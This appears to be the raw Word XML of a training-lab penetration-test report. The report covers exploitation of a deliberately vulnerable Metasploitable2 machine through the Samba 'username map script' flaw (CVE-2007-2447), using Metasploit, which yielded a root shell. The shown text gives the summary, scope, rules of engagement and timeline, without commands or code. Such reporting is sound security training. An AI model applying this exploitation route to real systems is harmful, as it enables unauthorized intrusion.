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3D14C" w14:textId="77777777" w:rsidR="003A2A16" w:rsidRPr="003A2A16" w:rsidRDefault="003A2A16" w:rsidP="003A2A16">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="2200"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EC14786" w14:textId="77777777" w:rsidR="003A2A16" w:rsidRPr="003A2A16" w:rsidRDefault="003A2A16" w:rsidP="003A2A16">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>PENETRATION TESTING REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E19D58" w14:textId="59E1DDCA" w:rsidR="003A2A16" w:rsidRPr="003A2A16" w:rsidRDefault="003A2A16" w:rsidP="003A2A16">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="200" w:after="200"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Samba Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355E259E" w14:textId="056FF886" w:rsidR="003A2A16" w:rsidRPr="003A2A16" w:rsidRDefault="003A2A16" w:rsidP="003A2A16">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:after="600"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Target: Metasploitable2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630EF6F5" w14:textId="632E79B6" w:rsidR="003A2A16" w:rsidRPr="003A2A16" w:rsidRDefault="003A2A16" w:rsidP="003A2A16">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="800"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared for: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab practice </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5024F489" w14:textId="55A015A9" w:rsidR="003A2A16" w:rsidRPr="003A2A16" w:rsidRDefault="003A2A16" w:rsidP="003A2A16">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Kali Linux </w:t>
      </w:r>
      <w:r w:rsidR="004F4A53">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Metasploitable2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C61C50" w14:textId="77777777" w:rsidR="003A2A16" w:rsidRPr="003A2A16" w:rsidRDefault="003A2A16" w:rsidP="003A2A16">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Assessment Date: July 22, 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F38FC29" w14:textId="77777777" w:rsidR="003A2A16" w:rsidRPr="003A2A16" w:rsidRDefault="003A2A16" w:rsidP="003A2A16">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Classification: Confidential – Lab Use Only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382E753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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="69542515" w14:textId="77777777" w:rsidR="003A2A16" w:rsidRPr="003A2A16" w:rsidRDefault="003A2A16" w:rsidP="003A2A16">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:sectPr w:rsidR="003A2A16" w:rsidRPr="003A2A16">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="720"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C1F8FDD"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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DEE714" w14:textId="77777777" w:rsidR="003A2A16" w:rsidRPr="003A2A16" w:rsidRDefault="003A2A16" w:rsidP="003A2A16">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>This report documents a controlled penetration test performed against a Metasploitable2 virtual machine (192.168.11.130) from a Kali Linux attack host (192.168.11.129) within an isolated lab network. The objective was to identify and exploit vulnerable network services on the target using standard reconnaissance, scanning, and exploitation methodology.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F53C348" w14:textId="77777777" w:rsidR="003A2A16" w:rsidRPr="003A2A16" w:rsidRDefault="003A2A16" w:rsidP="003A2A16">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="150" w:beforeAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>The assessment identified a critical remote code execution vulnerability in the Samba service (CVE-2007-2447, the “username map script” vulnerability), which was successfully exploited using the Metasploit Framework. Exploitation resulted in an unauthenticated remote shell with root-level privileges on the target host, representing a complete compromise of the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7772E7" w14:textId="77777777" w:rsidR="003A2A16" w:rsidRPr="003A2A16" w:rsidRDefault="003A2A16" w:rsidP="003A2A16">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:spacing w:before="150" w:beforeAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>This exercise was conducted entirely against Metasploitable2, an intentionally vulnerable virtual machine distributed by Rapid7 for security training and tool testing purposes, on a private, non-routable lab network (192.168.11.0/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>24)es</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003A2A16">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>, on a private, non-routable lab network (192.168.11.0/24).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607FE846" w14:textId="77777777" w:rsidR="003A2A16" w:rsidRPr="003A2A16" w:rsidRDefault="003A2A16" w:rsidP="00805F90">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2. Scope and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7150"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="476E49D0" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="25FEB60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Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7150" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="379AC46D"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Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="46618784" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6D127D96"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Attacker Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7150" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7968D93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Kali Linux, 192.168.11.129</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="436FC374" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2698B4E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Target Host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7150" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4B602B7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Metasploitable2, 192.168.11.130</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="3FB73AD6" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="31AA097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Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7150" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6339E94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Isolated private lab segment (192.168.11.0/24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="749EAA41" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7358E8C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Tools Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7150" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="34E5F2C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 xml:space="preserve">ping, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003A2A16">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003A2A16">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve"> 7.99, Metasploit Framework v6.4.135-dev</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="12373BB3" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="05F67F2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Target OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7150" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5C7867E9"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 xml:space="preserve">Linux </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="003A2A16">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>metasploitable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="003A2A16">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2.6.24-16-server (i686)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="5B251A12" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6BFA04A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Assessment Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7150" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7190CD69"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Black-box network penetration test (training lab)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="39661827"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2.1 Rules of Engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB9746D"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Testing was confined to the single authorized target host, 192.168.11.130, on a private, non-routable /24 lab segment with no connectivity to production systems or the internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B42E6D"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No denial-of-service techniques, data destruction, or persistence mechanisms were used; the objective was to demonstrate exploitability and gain a proof-of-concept shell only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4865C13F"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All actions were performed manually and logged in real time via terminal session capture (see Appendix A).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B369D4"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The target VM is Rapid7's Metasploitable2, an image intentionally shipped with vulnerable, out-of-date services for security training purposes, and is not representative of a hardened production host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EF989F"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2.2 Assessment Timeline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6750"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="04D1DA42" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7DBEE4D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lastRenderedPageBreak/>
              <w:t>Time (local)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6750" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1F5E6EE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Activity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="428F95FF" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="01AEC1E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23:38</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6750" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2850E5E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Host discovery (ping sweep)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="570E3C47" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="197A3D6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23:38–23:39</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6750" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0191F26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Port scanning and SMB service enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="43F8B54A" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="582B5339"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23:52–23:55</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6750" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1124987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Vulnerability research / exploit module selection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A2A16" w:rsidRPr="003A2A16" w14:paraId="1EE04377" w14:textId="77777777" w:rsidTr="003A2A16">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2600" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="374F9EF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23:55–23:57</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6750" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0493383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Exploitation and shell stabilization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
